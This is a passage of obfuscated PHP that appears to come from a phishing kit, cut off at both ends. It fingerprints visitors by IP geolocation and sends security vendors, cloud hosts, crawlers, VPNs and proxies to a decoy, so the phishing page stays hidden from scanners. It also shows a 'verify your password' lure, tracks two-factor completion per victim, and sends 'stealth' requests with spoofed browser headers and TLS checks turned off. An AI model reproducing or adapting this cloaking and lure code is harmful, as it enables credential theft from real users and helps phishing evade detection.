"\72\x3a\61" || filter_var($bbd77, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE))) { goto a1224; } goto E2b11; E2b11: return $bbd77; goto c8adb; C7e95: D604e: goto Df107; Df107: } goto d80d4; C5150: return "\125\x4e\x4b\x4e\117\127\116"; goto F781b; deb9a: $B0fc4 = ["\x48\124\x54\x50\137\x58\137\x46\x4f\122\127\x41\x52\104\105\x44\x5f\x46\117\x52", "\x48\124\x54\x50\x5f\103\114\x49\x45\x4e\124\137\111\120", "\x48\x54\x54\x50\x5f\130\137\x43\114\x55\x53\x54\105\122\137\103\114\111\105\x4e\x54\137\111\x50", "\110\x54\124\x50\137\x46\x4f\x52\x57\x41\122\104\105\104\x5f\106\117\122", "\x48\124\124\x50\x5f\106\x4f\x52\x57\x41\122\104\x45\104", "\122\x45\115\117\x54\105\137\x41\104\x44\x52"]; goto a1a5c; F781b: } public function getUserAgent() { goto B6b5d; B76b2: C0079: goto E0938; B6b5d: if (isset($_SERVER["\110\x54\124\x50\x5f\125\x53\x45\x52\x5f\x41\x47\105\116\124"])) { goto C0079; } goto db3b4; D5186: goto da9ed; goto B76b2; E0938: $Aaafa = htmlspecialchars(strip_tags($_SERVER["\x48\124\124\x50\x5f\125\123\105\x52\x5f\x41\107\105\116\124"]), ENT_QUOTES, "\125\x54\106\55\x38"); goto D71f6; D71f6: return $Aaafa; goto C6a52; C6a52: da9ed: goto d1898; db3b4: return "\x55\x4e\x4b\x4e\x4f\127\116"; goto D5186; d1898: } public function getClientLocation($bbd77) { goto B00bd; D9fdc: F00ea: goto d4055; E135a: $D2156 = json_decode($D2156, true); goto E5dca; a9388: curl_setopt($c669b, CURLOPT_CUSTOMREQUEST, "\107\x45\x54"); goto de49b; B5c2a: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto a9388; de49b: $D2156 = curl_exec($c669b); goto cb975; B00bd: $c669b = curl_init(); goto ac630; cb975: if (!($D2156 != '')) { goto F00ea; } goto E135a; ac630: curl_setopt($c669b, CURLOPT_URL, "\150\164\164\160\x73\x3a\x2f\57\141\160\151\56\151\x6e\143\157\x6c\x75\x6d\x69\x74\141\x73\56\x63\x6f\x6d\x2f\77\161\x3d" . $bbd77); goto B5c2a; E5dca: return $D2156; goto D9fdc; d4055: } function isBlockedISP($D2156) { goto D4992; Da06a: foreach ($D534a as $D09ff) { goto fc793; fc793: if (!(stripos($B8652, $D09ff) !== false)) { goto b7c39; } goto f2ad4; a8149: b7c39: goto C69a7; f2ad4: return true; goto a8149; C69a7: a32ea: goto Af010; Af010: } goto E1955; E1955: C8190: goto f257c; D4992: $D534a = array("\x6d\151\143\162\157\x73\157\146\x74", "\x6c\145\x61\163\145\167\145\142", "\155\62\x34\67", "\141\155\x61\x7a\157\x6e", "\157\166\x68", "\143\157\x67\x65\156\x74", "\141\x6c\151\142\x61\142\x61", "\x64\151\147\x69\x74\141\x6c\157\x63\x65\x61\156", "\x63\x68\157\157\160\x61", "\x6c\151\x6e\x6f\x64\145", "\147\157\157\147\154\x65", "\157\x72\141\x63\x6c\x65", "\x6c\x61\x79\x65\162\150\x6f\x73\164", "\x77\x6f\x72\154\144\163\164\x72\145\x61\x6d", "\x6e\145\170\164\147\x6c\x6f\142\x61\x6c", "\x69\164\160\162\x6f\170\x69\x6d\x75\x73", "\150\x6f\x73\x74\162\x6f\171\141\x6c\145", "\x63\145\156\164\x75\162\x79\154\151\x6e\153", "\141\166\141\x73\164", "\x62\151\164\144\145\x66\145\156\x64\x65\x72", "\167\x65\142\x6e\170", "\x6d\x79\x6c\x6f\143"); goto e72a5; f257c: return false; goto C92f8; e72a5: $B8652 = strtolower($D2156); goto Da06a; C92f8: } public function checkUserSecurity($D2156) { goto e9e61; e9e61: if (!$D2156["\x69\x6e\146\157"]["\163\x74\x61\164\x75\163"]) { goto Bbfd6; } goto Cd10d; B39e2: $this->redirect("\104\x75\155\x6d\x79\102\x6f\164"); goto E69a1; c8269: D9f30: goto dad7d; E2ebe: if (!($this->b5c62["\x62\x6f\164"]["\160\162\157\170\x79"] == 1 && $D2156["\x69\x6e\146\x6f"]["\151\163\x5f\160\x72\x6f\x78\x79"])) { goto D9f30; } goto a7fb5; dad7d: if (!($this->b5c62["\142\x6f\x74"]["\x61\142\x75\163\145\x72"] == 1 && $D2156["\x69\156\x66\157"]["\x69\163\x5f\141\x62\165\x73\145\x72"])) { goto E84ba; } goto B39e2; C7e91: if (!($D2156["\x69\x6e\x66\157"]["\151\x73\137\144\x61\164\x61\x63\x65\x6e\164\145\x72"] != false && $this->b5c62["\142\x6f\x74"]["\144\x61\164\x61\143\145\x6e\x74\145\x72"] == 1 && $D2156["\151\x6e\146\157"]["\151\163\137\142\154\x6f\x63\x6b\x65\x64\x5f\x64\x61\x74\x61\143\145\x6e\164\145\x72"] == true)) { goto E0c00; } goto A39e7; ead33: goto e348e; goto E6743; a7fb5: $this->redirect("\104\165\155\155\171\102\157\164"); goto c8269; E6743: fe359: goto e617d; F31d1: da561: goto E22e4; e617d: $this->redirect("\x44\x75\155\155\x79\102\x6f\164"); goto Dd63a; Cd10d: if (!($this->b5c62["\x62\x6f\x74"]["\x63\162\141\167\x6c\145\x72"] == 1 && $D2156["\151\x6e\146\x6f"]["\x69\163\137\x63\162\141\167\x6c\145\x72"])) { goto Ef6c2; } goto cec89; cec89: $this->redirect("\x44\165\155\x6d\171\102\157\x74"); goto aab1d; E22e4: if (!($this->b5c62["\x62\x6f\x74"]["\x76\160\x6e"] == 1 && $D2156["\x69\156\146\x6f"]["\x69\x73\x5f\166\x70\x6e"])) { goto fa8b8; } goto D6436; E69a1: E84ba: goto Cf1fe; Cf1fe: Bbfd6: goto Fe570; D6436: $this->redirect("\x44\165\x6d\155\171\x42\x6f\164"); goto ecc2b; ecc2b: fa8b8: goto E2ebe; C231e: if (!($this->b5c62["\142\157\x74"]["\x64\141\164\x61\x63\x65\x6e\x74\x65\162"] != 0)) { goto da561; } goto C827b; A78ce: E0c00: goto ead33; C827b: if ($D2156["\151\x6e\146\x6f"]["\151\x73\137\144\x61\x74\141\143\x65\x6e\x74\x65\162"] != false && $this->b5c62["\142\x6f\164"]["\x64\x61\164\x61\x63\x65\x6e\164\x65\x72"] == 2) { goto fe359; } goto C7e91; A39e7: $this->redirect("\104\x75\155\x6d\x79\x42\157\x74"); goto A78ce; Dd63a: e348e: goto F31d1; aab1d: Ef6c2: goto C231e; Fe570: } public function insertUserInformation($bbd77, $A0b3d = true) { goto F19f0; A647f: $D2156["\x69\156\146\x6f"]["\x69\163\x5f\x62\x6c\157\143\x6b\145\x64\x5f\x64\141\164\x61\x63\145\x6e\x74\x65\162"] = false; goto C2987; a1bed: $D2156["\x69\x6e\146\x6f"]["\151\x73\137\x61\142\x75\163\x65\162"] = false; goto A647f; aa897: if ($a51a1 !== null && is_array($a51a1)) { goto a807b; } goto Ee939; Bac37: $D2156["\x69\156\x66\157"]["\151\163\137\144\141\164\x61\x63\145\x6e\164\145\162"] = false; goto Ed468; C5e8f: $D2156["\x69\x6e\146\157"]["\151\163\x5f\x64\141\x74\141\x63\145\156\x74\x65\162"] = false; goto c1743; deb6c: $D2156["\151\156\x66\157"]["\143\x6f\x75\x6e\x74\x72\171"] = false; goto ba9e9; D07b5: $D2156["\x69\156\x66\157"]["\151\163\x5f\142\x6c\157\x63\153\145\144\137\144\x61\164\141\x63\145\x6e\164\145\x72"] = false; goto e2efa; A90b5: $D2156["\x69\156\146\x6f"]["\x69\163\137\x62\154\x6f\x63\153\145\144\137\x64\x61\164\141\x63\x65\156\164\x65\162"] = $this->isBlockedISP($a51a1["\144\141\x74\x61\x63\x65\156\164\145\x72"]["\x64\157\155\141\151\156"]); goto b1b93; d317b: $D2156["\151\156\x66\157"]["\143\x69\x74\x79"] = $a51a1["\x6c\x6f\143\141\x74\151\157\x6e"]["\x63\x69\164\x79"]; goto cd31a; D50cd: $D2156["\151\x6e\x66\157"]["\x73\x74\141\x74\x75\x73"] = true; goto ff005; dacdc: return $D2156; goto Cfa10; c58f0: if (!($D2156["\151\x6e\146\157"]["\x69\x73\x5f\144\x61\x74\x61\143\145\156\x74\145\162"] != false)) { goto dcf9b; } goto Bcffc; bec15: if (!isset($a51a1["\x64\x61\164\x61\x63\145\156\x74\x65\162"]["\x64\x61\x74\141\143\x65\156\x74\x65\162"])) { goto F3b99; } goto fa4a9; B746f: $D2156["\x69\156\x66\x6f"]["\151\163\x5f\144\x61\164\x61\x63\145\156\x74\145\x72"] = $a51a1["\151\x73\x5f\144\141\164\x61\x63\145\156\x74\x65\x72"]; goto c07dd; D3741: $D2156["\151\x6e\x66\x6f"]["\151\x73\x5f\166\x70\x6e"] = false; goto c75ed; Ed468: $D2156["\151\x6e\x66\157"]["\x69\163\x5f\160\162\157\170\x79"] = false; goto f1af7; ae9d6: $D2156["\151\156\146\157"]["\151\163\137\142\x6c\x6f\x63\x6b\145\x64\x5f\x64\x61\164\141\143\x65\156\164\x65\x72"] = false; goto c58f0; c80b1: $D2156["\165\x61"] = $this->getUserAgent(); goto b58eb; e089b: F3b99: goto B9e18; c07dd: $D2156["\151\x6e\146\157"]["\151\x73\137\160\x72\x6f\x78\x79"] = $a51a1["\151\x73\x5f\x70\162\x6f\170\171"]; goto a63ec; A8ed1: Ce3c9: goto a211f; Aa3e8: $D2156["\166\141\x6c\151\x64\x5f\143\141\x70\x74\143\150\x61"] = $A0b3d; goto f6ae2; c1743: $D2156["\151\x6e\146\157"]["\151\163\137\x70\x72\x6f\170\171"] = false; goto D3741; ba9e9: $D2156["\151\156\146\157"]["\x63\151\x74\171"] = false; goto e03b8; f6ae2: if ($D2156["\151\160"] != "\125\x4e\113\x4e\117\x57\x4e" && $D2156["\166\x61\x6c\151\x64\x5f\x63\x61\160\x74\x63\150\141"]) { goto Ce3c9; } goto deb6c; e2efa: goto A3bf4; goto B298d; B9e18: if (!($D2156["\151\156\146\157"]["\x69\x73\137\142\154\157\x63\x6b\x65\x64\137\x64\x61\x74\141\143\145\156\x74\x65\x72"] == false)) { goto Aafa8; } goto D6f4d; c75ed: $D2156["\151\x6e\146\157"]["\x69\x73\x5f\141\x62\x75\x73\x65\x72"] = false; goto D07b5; b1b93: Ab56f: goto ea0d6; E0352: $D2156["\x69\x6e\146\x6f"]["\x69\163\137\x61\x62\x75\x73\x65\162"] = $a51a1["\x69\x73\x5f\x61\142\x75\x73\x65\162"]; goto ae9d6; F19f0: $D2156["\x69\x70"] = $bbd77; goto c80b1; cd31a: $D2156["\x69\x6e\146\157"]["\151\x73\x5f\x63\162\x61\x77\154\x65\x72"] = $a51a1["\151\163\137\x63\x72\x61\167\x6c\x65\162"]; goto B746f; D6f4d: if (!isset($a51a1["\x64\141\164\x61\143\x65\156\164\x65\162"]["\144\157\155\x61\151\156"])) { goto Ab56f; } goto A90b5; Ef0cb: a78cd: goto F3e76; F5f43: dcf9b: goto Ef0cb; ea0d6: Aafa8: goto A89b7; F3e76: A3bf4: goto e3129; a63ec: $D2156["\x69\156\146\157"]["\x69\163\137\166\160\156"] = $a51a1["\x69\163\x5f\x76\x70\x6e"]; goto E0352; b58eb: $D2156["\151\156\x66\157"]["\163\164\x61\x74\165\x73"] = false; goto Aa3e8; c72b3: $D2156["\x69\x6e\146\x6f"]["\143\x6f\165\156\x74\162\171\137\x63\157\x64\x65"] = $a51a1["\154\157\143\x61\x74\x69\x6f\x6e"]["\143\x6f\x75\156\164\162\x79\137\143\157\144\145"]; goto d317b; F3187: if (!(isset($a51a1["\154\157\143\141\x74\151\157\x6e"]) && isset($a51a1["\x69\x73\137\143\x72\x61\167\x6c\x65\162"]) && isset($a51a1["\151\x73\137\x64\x61\x74\141\x63\x65\156\x74\x65\162"]) && isset($a51a1["\151\x73\137\x70\x72\x6f\170\171"]) && isset($a51a1["\151\163\x5f\166\x70\x6e"]) && isset($a51a1["\x69\163\x5f\x61\x62\x75\x73\145\x72"]))) { goto a78cd; } goto D50cd; Bcffc: if (!isset($a51a1["\x64\141\164\141\143\145\x6e\x74\x65\162"])) { goto c3fa0; } goto bec15; faec1: $D2156["\x69\156\x66\x6f"]["\x63\x69\x74\171"] = false; goto d8dbe; B298d: a807b: goto F3187; Ee939: $D2156["\151\156\x66\157"]["\143\157\165\156\164\x72\171"] = false; goto faec1; A89b7: c3fa0: goto F5f43; e3129: e163c: goto dacdc; f1af7: $D2156["\x69\156\146\157"]["\151\163\137\166\160\x6e"] = false; goto a1bed; e03b8: $D2156["\151\156\146\x6f"]["\151\163\x5f\143\x72\141\x77\154\x65\x72"] = false; goto Bac37; fa4a9: $D2156["\x69\x6e\x66\157"]["\x69\163\x5f\142\154\157\143\x6b\x65\x64\x5f\144\141\164\x61\x63\145\156\x74\x65\x72"] = $this->isBlockedISP($a51a1["\144\141\x74\141\x63\145\156\x74\x65\x72"]["\144\x61\x74\x61\x63\145\x6e\164\x65\x72"]); goto e089b; d8dbe: $D2156["\x69\156\x66\157"]["\x69\163\x5f\143\x72\x61\x77\x6c\145\162"] = false; goto C5e8f; C2987: goto e163c; goto A8ed1; ff005: $D2156["\151\156\x66\x6f"]["\143\x6f\x75\x6e\x74\x72\x79"] = $a51a1["\154\157\x63\x61\164\151\x6f\x6e"]["\x63\x6f\x75\156\x74\x72\x79"]; goto c72b3; a211f: $a51a1 = $this->getClientLocation($bbd77); goto aa897; Cfa10: } public function getBackgroundVerify($Ca699 = true, $e9592 = '', $Df1cb = false) { goto Dfe94; cb608: $D3f03 = $this->imageToBase64($a5f65); goto a1852; Adeb4: ea79f: goto E18fa; D8197: if (file_exists($a5f65)) { goto D2860; } goto E6974; d1111: $D3f03 = $e9592; goto Db2ef; d9271: die("\x69\x6d\141\147\145\40\x6e\x6f\x74\40\x66\x6f\x75\156\144\56"); goto bf937; Db2ef: bf030: goto ec53e; b3218: $a5f65 = "\160\141\x67\x65\x2f\x69\x6d\141\147\x65\163\57" . $this->b5c62["\143\x75\x73\164\x6f\155\x5f\142\x61\x63\x6b\147\162\157\x75\x6e\x64"]; goto De00b; E18fa: if (!$Ca699) { goto A0a40; } goto cb608; E2977: D67ec: goto bbd70; E6974: die("\x69\155\x61\147\145\x20\156\x6f\x74\40\146\x6f\x75\156\x64\56"); goto d77da; ec53e: if (!$Df1cb) { goto Ba603; } goto f15eb; De00b: if (file_exists($a5f65)) { goto F003c; } goto d9271; cff36: $a5f65 = "\x70\141\x67\145\x2f\x69\x6d\x61\x67\145\163\57" . $this->b5c62["\x62\x61\143\153\x67\x72\x6f\x75\x6e\x64"] . "\x2e\x70\156\147"; goto D8197; e983c: $a5f65 = "\x69\155\x61\147\x65\163\x2f" . $this->b5c62["\142\x61\x63\153\x67\x72\x6f\165\156\144"] . "\x2e\x70\x6e\147"; goto Da1d2; a1852: goto bf030; goto b502e; df62b: Ba603: goto Fe271; b502e: A0a40: goto d1111; Ef10d: if (file_exists($a5f65)) { goto Cfbd2; } goto b3218; bbd70: goto ea79f; goto B9e35; bf937: F003c: goto b6a7b; b6a7b: Cfbd2: goto Adeb4; Dfe94: if ($this->b5c62["\x62\141\x63\153\147\x72\x6f\x75\156\x64"] == "\143\x75\163\x74\157\155") { goto caff1; } goto e983c; Fe271: return "\xd\12\40\40\x20\x20\x20\x20\40\x20\150\164\x6d\x6c\54\xd\xa\40\x20\40\40\x20\x20\x20\x20\142\157\x64\x79\x20\173\15\xa\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\143\x6f\156\x74\x65\156\164\72\40\x22\42\73\x20\x2f\52\40\x45\x6d\160\164\x79\x20\x63\157\156\164\x65\156\164\x20\x74\x6f\x20\141\x6c\154\x6f\x77\40\164\150\145\40\160\163\145\165\144\157\55\x65\x6c\x65\155\x65\156\x74\x20\x74\x6f\x20\162\145\x6e\144\x65\x72\40\x2a\57\15\12\x20\x20\40\40\40\x20\40\x20\40\40\40\40\160\157\x73\x69\x74\151\157\156\x3a\x20\141\142\163\157\154\x75\164\x65\x3b\x20\x2f\52\40\x41\142\x73\157\x6c\165\x74\145\x20\160\157\x73\x69\x74\x69\x6f\156\x69\156\x67\x20\x2a\x2f\15\12\40\x20\x20\40\x20\40\40\x20\40\x20\40\40\164\x6f\x70\72\40\x30\73\15\12\40\40\40\40\40\x20\40\x20\x20\40\40\40\x6c\x65\x66\x74\72\40\x30\x3b\15\12\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\40\x72\151\147\x68\x74\72\x20\x30\x3b\15\xa\x20\40\40\x20\x20\40\x20\40\40\40\x20\40\x62\x6f\x74\x74\157\155\x3a\40\60\73\15\12\x20\40\x20\40\40\x20\40\x20\40\40\40\x20\x7a\55\x69\156\144\145\170\x3a\40\55\x31\x3b\x20\x2f\x2a\40\x45\x6e\163\x75\162\145\40\x69\164\40\x73\164\141\x79\163\40\142\x65\x68\151\156\144\40\157\x74\150\145\162\x20\x63\x6f\156\x74\x65\156\x74\x20\x2a\x2f\15\12\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\142\141\143\x6b\x67\162\157\165\156\144\x2d\x69\x6d\x61\147\145\x3a\40\165\162\154\x28\42" . $D3f03 . "\x22\x29\x3b\xd\12\40\40\x20\40\x20\40\40\40\40\40\x20\40\142\x61\x63\x6b\147\162\x6f\165\156\144\55\x73\x69\172\145\72\x20\143\157\x76\x65\x72\73\x20\57\52\40\x53\143\141\x6c\x65\40\x69\155\x61\147\x65\x20\164\157\x20\143\x6f\166\x65\x72\x20\x74\150\x65\x20\x65\x6e\x74\151\x72\x65\40\141\162\x65\x61\40\52\x2f\xd\xa\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\x62\x61\143\x6b\147\162\157\165\x6e\144\x2d\160\157\x73\x69\x74\151\157\x6e\x3a\40\143\145\x6e\x74\145\162\73\40\x2f\x2a\40\103\x65\x6e\164\x65\162\40\x74\150\145\40\142\x61\x63\x6b\x67\162\157\165\x6e\x64\x20\151\155\x61\147\x65\40\52\x2f\15\12\40\x20\x20\40\x20\40\40\40\40\40\x20\40\142\x61\143\x6b\x67\162\157\x75\x6e\x64\55\162\x65\160\x65\x61\164\x3a\x20\x6e\x6f\x2d\162\x65\160\145\x61\164\x3b\40\x2f\x2a\40\x50\x72\145\x76\145\156\x74\x20\162\145\x70\x65\x61\x74\151\x6e\147\x20\164\150\x65\40\x69\x6d\x61\147\x65\x20\52\57\xd\xa\x20\x20\x20\40\x20\40\x20\x20\x7d\x20\15\12\x20\x20\x20\x20\x20\40\x20\x20"; goto c2f08; f15eb: return $D3f03; goto df62b; d77da: D2860: goto E2977; B9e35: caff1: goto f7647; f7647: $a5f65 = "\151\155\141\x67\145\x73\57" . $this->b5c62["\143\165\x73\x74\x6f\155\137\142\x61\143\x6b\x67\162\157\165\156\x64"]; goto Ef10d; Da1d2: if (file_exists($a5f65)) { goto D67ec; } goto cff36; c2f08: } public function getFirstMessage() { goto A4000; B91d0: goto B04f1; goto df5d9; e25c4: return "\x42\145\143\141\165\x73\x65\40\x79\157\x75\47\x72\x65\40\x61\143\x63\145\163\x73\x69\156\x67\x20\x73\x65\x6e\163\151\164\151\166\x65\40\151\x6e\146\157\x2c\40\x79\157\x75\40\x6e\145\145\144\40\164\x6f\x20\x76\145\162\151\146\x79\x20\171\157\165\x72\x20\x70\141\x73\x73\x77\x6f\x72\144"; goto dc559; d478f: d057d: goto B91d0; E3d6d: A51c7: goto dde22; F7de1: goto d057d; goto E3d6d; D35d9: return ''; goto cfa66; dde22: return $this->b5c62["\x63\x75\x73\x74\157\155\x5f\x66\x69\162\163\x74\155\145\163\x73\141\147\x65"]; goto d478f; dc559: B04f1: goto ed016; Dc688: if ($Dd25a == "\164\145\170\164") { goto A51c7; } goto A4ceb; ed016: goto fd5c9; goto edf10; a2cee: if ($Dd25a == "\144\145\146\x61\165\x6c\164") { goto bffd4; } goto Dc688; c7c28: if ($Dd25a == "\x6e\157\156\145") { goto f70cd; } goto a2cee; A4ceb: if (!($Dd25a == "\x69\x6d\141\147\145\x73")) { goto a4a3e; } goto ecad1; e03c8: a4a3e: goto F7de1; df5d9: bffd4: goto e25c4; ecad1: return "\74\x69\x6d\147\40\x73\162\x63\x3d\42" . $this->imageToBase64("\x2e\x2e\57" . $this->b5c62["\143\165\163\164\x6f\x6d\x5f\146\x69\x72\163\164\x6d\x65\x73\x73\x61\x67\145"]) . "\x22\x20\x61\154\x74\x3d\x22\x49\143\x6f\156\42\x20\163\x74\171\154\145\75\42\x77\x69\144\164\150\x3a\x20\65\x30\45\73\x20\x68\x65\151\147\x68\x74\x3a\x20\x61\165\164\x6f\x3b\42\x20\x63\154\141\x73\x73\75\42\144\x2d\142\154\157\143\x6b\42\57\x3e"; goto e03c8; edf10: f70cd: goto D35d9; cfa66: fd5c9: goto Cc44c; A4000: $Dd25a = $this->b5c62["\146\x69\162\163\x74\x5f\155\x65\163\163\x61\147\x65"]; goto c7c28; Cc44c: } public function readJsonFile($B6346) { goto df718; df718: if (file_exists($B6346)) { goto cbfeb; } goto Dfabf; Fcd05: return is_array($Bbeec) ? $Bbeec : []; goto a0e4a; f57d4: $Bbeec = json_decode($e1200, true); goto Fcd05; b6ccd: return []; goto D338a; Dfabf: file_put_contents($B6346, json_encode([])); goto b6ccd; D338a: cbfeb: goto Adf3d; Adf3d: $e1200 = file_get_contents($B6346); goto f57d4; a0e4a: } public function writeJsonFile($B6346, $Bbeec) { $e1200 = json_encode($Bbeec, JSON_PRETTY_PRINT); file_put_contents($B6346, $e1200); } public function getFirstDataByIp($Bbeec, $bbd77) { goto B6b33; Ca1ed: e441c: goto D7c6e; D7c6e: return null; goto d3f4f; B6b33: foreach ($Bbeec as $b8a12) { goto C093a; a7f54: return $b8a12; goto E3ece; E3ece: F386c: goto a551a; a551a: Fd3c4: goto d9604; C093a: if (!(isset($b8a12["\151\160"]) && $b8a12["\x69\x70"] === $bbd77)) { goto F386c; } goto a7f54; d9604: } goto Ca1ed; d3f4f: } public function generatePrimaryId($Bbeec) { goto De93d; De93d: $b2dee = 0; goto D8e94; B216d: dd5a7: goto Fb270; D8e94: foreach ($Bbeec as $b8a12) { goto c8a2b; e0f9a: ef584: goto Af64a; c8a2b: if (!(isset($b8a12["\x69\144"]) && $b8a12["\x69\144"] > $b2dee)) { goto a1d2b; } goto Bc330; Bc330: $b2dee = $b8a12["\151\x64"]; goto Ebaad; Ebaad: a1d2b: goto e0f9a; Af64a: } goto B216d; Fb270: return $b2dee + 1; goto db4b3; db4b3: } public function isDataExist($Bbeec, $bbd77) { goto Ee015; Ee015: foreach ($Bbeec as $b8a12) { goto C7edb; c9255: return true; goto Ff86a; C7edb: if (!(isset($b8a12["\x69\x70"]) && $b8a12["\151\160"] === $bbd77)) { goto b400f; } goto c9255; Bbc6c: e37e5: goto eae86; Ff86a: b400f: goto Bbc6c; eae86: } goto E8339; eef10: return false; goto Efca2; E8339: d029b: goto eef10; Efca2: } public function makeStealthRequest($df8c4) { goto ae9c5; Cda82: $c669b = curl_init(); goto C935e; C935e: curl_setopt($c669b, CURLOPT_URL, $df8c4); goto c142a; e26ca: return $Fc5f1; goto add89; ab9c8: f7236: goto Dbc64; b6fb4: curl_setopt($c669b, CURLOPT_SSL_VERIFYHOST, 0); goto bc245; bc245: curl_setopt($c669b, CURLOPT_FOLLOWLOCATION, true); goto d95ae; d95ae: $Fc5f1 = curl_exec($c669b); goto Ef8c8; b5e3c: curl_setopt($c669b, CURLOPT_SSL_VERIFYPEER, 0); goto b6fb4; e00e6: echo "\x63\125\122\114\40\105\x72\x72\157\162\72\40" . curl_error($c669b); goto ab9c8; c142a: curl_setopt($c669b, CURLOPT_HTTPHEADER, ["\125\x73\x65\x72\x2d\101\x67\145\x6e\164\x3a\x20{$f9711}", "\101\x63\x63\x65\x70\164\x3a\40\164\x65\x78\x74\57\150\x74\x6d\154\x2c\141\x70\160\154\151\x63\141\x74\x69\157\156\x2f\170\150\164\155\154\x2b\170\x6d\x6c\54\141\160\x70\154\x69\x63\x61\x74\151\157\x6e\57\170\155\x6c\73\161\75\60\56\71\x2c\x69\155\141\x67\x65\57\167\x65\142\160\x2c\x2a\x2f\x2a\73\161\x3d\x30\56\x38", "\x41\x63\143\x65\160\164\55\x45\156\143\x6f\x64\151\156\x67\72\40\x67\x7a\x69\x70\x2c\x20\144\x65\146\x6c\141\164\x65\x2c\40\x62\x72", "\x41\x63\143\145\160\164\55\x4c\141\156\147\165\141\x67\145\x3a\40\145\156\55\x55\x53\x2c\145\x6e\73\161\75\60\x2e\x39", "\103\x6f\156\x6e\x65\143\164\x69\x6f\x6e\72\x20\153\145\x65\x70\x2d\x61\x6c\151\x76\145", "\122\145\x66\145\162\145\x72\72\x20\150\x74\164\160\x73\x3a\57\57\x77\x77\x77\x2e\147\157\157\147\x6c\x65\56\x63\157\x6d\x2f"]); goto D76a0; D76a0: curl_setopt($c669b, CURLOPT_RETURNTRANSFER, 1); goto b5e3c; Dbc64: curl_close($c669b); goto e26ca; Ef8c8: if (!curl_errno($c669b)) { goto f7236; } goto e00e6; d31bc: $f9711 = $dcf03[array_rand($dcf03)]; goto Cda82; ae9c5: $dcf03 = ["\115\x6f\172\x69\154\154\141\x2f\x35\x2e\x30\40\x28\127\x69\156\x64\157\167\163\x20\116\124\x20\x31\x30\56\60\73\40\127\x69\156\x36\x34\73\40\x78\x36\x34\51\40\x41\160\160\x6c\145\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\63\x36\x20\50\113\x48\x54\115\114\x2c\40\154\151\153\x65\40\107\145\x63\x6b\x6f\x29\x20\103\x68\162\x6f\155\145\57\71\x31\x2e\60\x2e\x34\64\67\62\56\x31\62\x34\x20\x53\x61\146\x61\162\151\x2f\65\63\67\x2e\x33\66", "\x4d\x6f\x7a\x69\x6c\154\x61\57\65\56\60\x20\50\127\151\156\x64\x6f\167\163\x20\116\x54\x20\61\x30\56\60\x3b\x20\x57\151\x6e\66\64\73\x20\170\x36\x34\x29\40\x41\x70\x70\154\x65\127\145\142\x4b\151\164\x2f\65\x33\x37\56\x33\66\40\50\x4b\x48\x54\x4d\114\x2c\x20\154\151\153\x65\x20\x47\145\143\x6b\x6f\51\40\106\x69\x72\145\x66\157\x78\x2f\x38\71\x2e\60", "\115\157\172\x69\154\x6c\141\x2f\65\x2e\60\x20\x28\x57\151\156\x64\157\167\163\x20\116\x54\40\61\60\x2e\60\73\x20\x57\x69\156\x36\x34\x3b\x20\x78\x36\x34\x29\40\101\x70\x70\x6c\145\x57\145\142\x4b\151\164\57\x35\x33\67\x2e\x33\x36\40\x28\113\110\124\x4d\114\x2c\40\154\151\x6b\145\x20\107\x65\143\x6b\x6f\51\40\105\x64\x67\x65\x2f\x39\x31\x2e\60\x2e\70\66\64\56\x35\71", "\x4d\157\x7a\x69\154\154\x61\57\65\56\60\40\x28\115\141\143\x69\156\x74\x6f\163\150\73\x20\111\x6e\x74\145\x6c\40\115\141\143\40\x4f\123\x20\x58\x20\x31\x30\x5f\61\65\137\x34\51\40\101\160\160\154\145\x57\145\142\x4b\151\x74\x2f\x35\63\x37\x2e\63\x36\40\x28\x4b\110\124\115\114\54\x20\x6c\151\153\x65\x20\107\145\143\x6b\157\51\40\103\150\x72\x6f\x6d\x65\57\70\x31\x2e\x30\x2e\64\x30\x34\64\x2e\61\63\x38\x20\123\141\x66\141\162\x69\x2f\65\63\67\56\x33\x36", "\115\157\x7a\x69\154\154\141\57\x35\x2e\x30\x20\50\115\x61\143\151\x6e\x74\x6f\x73\150\73\x20\x49\156\164\145\154\x20\x4d\x61\143\40\x4f\123\x20\x58\40\61\60\137\x31\x35\x5f\x33\x29\40\x41\x70\160\x6c\145\x57\x65\x62\x4b\151\164\57\65\63\67\x2e\x33\x36\x20\50\113\x48\x54\115\x4c\x2c\x20\x6c\151\153\x65\40\107\x65\143\153\x6f\51\40\x46\x69\x72\x65\x66\157\170\57\x37\x34\56\x30"]; goto d31bc; add89: } public function onlyOneTimeUse() { goto B6b5e; a46c9: cc3b3: goto C6c26; F8508: if (!($bbd77 == "\72\x3a\61")) { goto cc3b3; } goto E36f6; B6b5e: $F35e2 = dirname(__FILE__); goto F842f; ee39e: return $De0aa; goto ac46a; F842f: $B6346 = $F35e2 . "\x2f\56\x2e\57" . $this->b5c62["\x66\x69\x6c\x65\163"]["\166\141\154\x69\x64"]; goto af81f; C67fe: B7150: goto ee39e; E36f6: $bbd77 = "\61\63\62\x2e\x32\64\62\56\62\61\63\56\62\x30\x32"; goto a46c9; C6c26: foreach ($Bbeec as $E5923) { goto Ad2b3; c3458: if ($E5923["\x64\x65\164\x61\x69\154\x73"]["\x74\167\x6f\x66\x61\143\164\x6f\162"]) { goto b0c4a; } goto c5237; Ad2b3: if (!($E5923["\x69\160"] == $bbd77)) { goto E1a2a; } goto d0724; d89e3: b0c4a: goto eb034; aa131: cd0f1: goto A6904; d0724: if ($E5923["\x64\145\x74\141\x69\x6c\163"]["\x74\167\x6f\x66\141\x63\x74\157\162"] && $E5923["\144\x65\x74\141\151\154\x73"]["\164\167\157\x66\141\x63\164\157\x72\137\x73\164\141\x74\165\163"] == "\103\x6f\x6d\160\154\145\164\145") { goto cd0f1; } goto c3458; E153b: E1a2a: goto F904c; c5237: $De0aa = true; goto d89e3; eb034: goto d1d6f; goto aa131; F904c: Afa56: goto Fd6a1; A6904: $De0aa = true; goto F9180; F9180: d1d6f: goto E153b; Fd6a1: } goto C67fe; af81f: $Bbeec = $this->readJsonFile($B6346); goto E2b5a; fab3f: $bbd77 = $this->getClientIp(); goto F8508; E2b5a: $De0aa = false; goto fab3f; ac46a: } public function editData($b5c0b, $Dc230) { goto B92c2; b33d1: $Bbeec = 